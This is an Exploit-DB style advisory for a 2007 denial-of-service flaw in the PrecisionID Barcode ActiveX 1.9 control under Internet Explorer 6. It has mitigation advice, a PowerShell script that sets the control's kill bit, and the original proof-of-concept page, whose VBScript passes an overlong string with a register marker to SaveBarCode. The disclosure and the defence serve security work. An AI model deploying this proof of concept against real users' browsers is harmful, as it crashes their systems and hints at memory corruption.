Vendor: Barcode ActiveX control
By: shinnai
CVSS: 5.5 (MEDIUM)
Denial of Service
CWE: 399
Product Name: Barcode ActiveX control
Affected Version From: 1.9
Affected Version To: 1.9
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2 with Internet Explorer 6
2007

IE 6 PrecisionID Barcode ActiveX 1.9 0day (PrecisionID_Barcode.dll) Denial of Service

This exploit targets the PrecisionID Barcode ActiveX control version 1.9 (PrecisionID_Barcode.dll) when it is loaded in Internet Explorer 6. By passing an overly long string to the control's SaveBarCode method, as the proof of concept does, a web page can cause a denial of service condition. The exploit has been tested on Windows XP Professional SP2 with all patches applied and Internet Explorer 6. Other software that uses this ActiveX control may also be vulnerable.

Mitigation:

To mitigate this vulnerability, users are advised to update to a newer version of the PrecisionID Barcode ActiveX control or remove it if it is not necessary. Additionally, keeping the operating system and browser up to date with the latest patches and security updates can help prevent exploitation.
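
Where the control cannot be removed right away, setting the Internet Explorer kill bit for its CLSID stops the browser from instantiating it. The PowerShell below is an added example, not part of the original advisory or of the vendor's tooling; the CLSID is the one in the proof of concept's `<object>` tag, and the helper names `Get-CompatFlags` and `Set-KillBit` are hypothetical.

```powershell
# Added example: audit and set the IE kill bit for the control on this page.
$Clsid   = '{731766D0-8541-11DB-99C1-0050C2490048}'  # classid from the page's <object> tag
$KillBit = 0x400                                      # "Compatibility Flags" bit that blocks loading in IE

# Native and 32-bit-on-64-bit views of the ActiveX Compatibility key.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

# Hypothetical helper: read the current flags, 0 if the key or value is absent.
function Get-CompatFlags([string]$Root) {
    $key  = Join-Path $Root $Clsid
    $prop = Get-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $prop) { return 0 }
    return [int]$prop.'Compatibility Flags'
}

# Hypothetical helper: OR the kill bit into the existing flags so other bits survive.
function Set-KillBit([string]$Root) {
    $key = Join-Path $Root $Clsid
    if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
    $flags = (Get-CompatFlags $Root) -bor $KillBit
    Set-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -Value $flags -Type DWord
}

# Report where the control is registered, if at all.
$server = Get-ItemProperty -LiteralPath "HKLM:\SOFTWARE\Classes\CLSID\$Clsid\InprocServer32" -ErrorAction SilentlyContinue
if ($server) { "Registered: $($server.'(default)')" } else { 'Control not registered in the native HKLM view' }

foreach ($root in $Roots) {
    if (-not (Test-Path -LiteralPath $root)) { continue }   # view absent on 32-bit Windows
    if (((Get-CompatFlags $root) -band $KillBit) -eq 0) {
        Set-KillBit $root                                   # requires an elevated session
        "Kill bit set under $root"
    } else {
        "Kill bit already present under $root"
    }
}
```

The kill bit only affects Internet Explorer and hosts that honor it; other software that loads the control directly is not protected, so removing the control remains the complete fix.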

Exploit-DB raw data:

<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/16</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">---------------------------------------------------------------------------------------
 <b>IE 6 PrecisionID Barcode ActiveX 1.9 0day (PrecisionID_Barcode.dll) Denial of Service</b>
 url: http://www.precisionid.com/

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6
 all software that uses this ocx is vulnerable to these exploits.

 If you try this exploit with IE 7, it just stops responding
---------------------------------------------------------------------------------------

<object classid='clsid:731766D0-8541-11DB-99C1-0050C2490048' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  buff = String(348,"A")
  get_ESI = "aaaa"
  buff1 = String(665,"B")
  test.SaveBarCode buff + get_ESI + buff1
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-05-16]